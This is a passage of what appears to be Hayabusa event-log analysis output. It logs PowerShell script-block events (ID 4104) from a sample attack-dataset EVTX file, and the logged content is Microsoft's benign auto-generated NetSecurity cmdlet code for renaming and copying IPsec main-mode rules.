[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSe",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"oup}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeRule' -Alias '*' function Copy-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSe",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"tName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 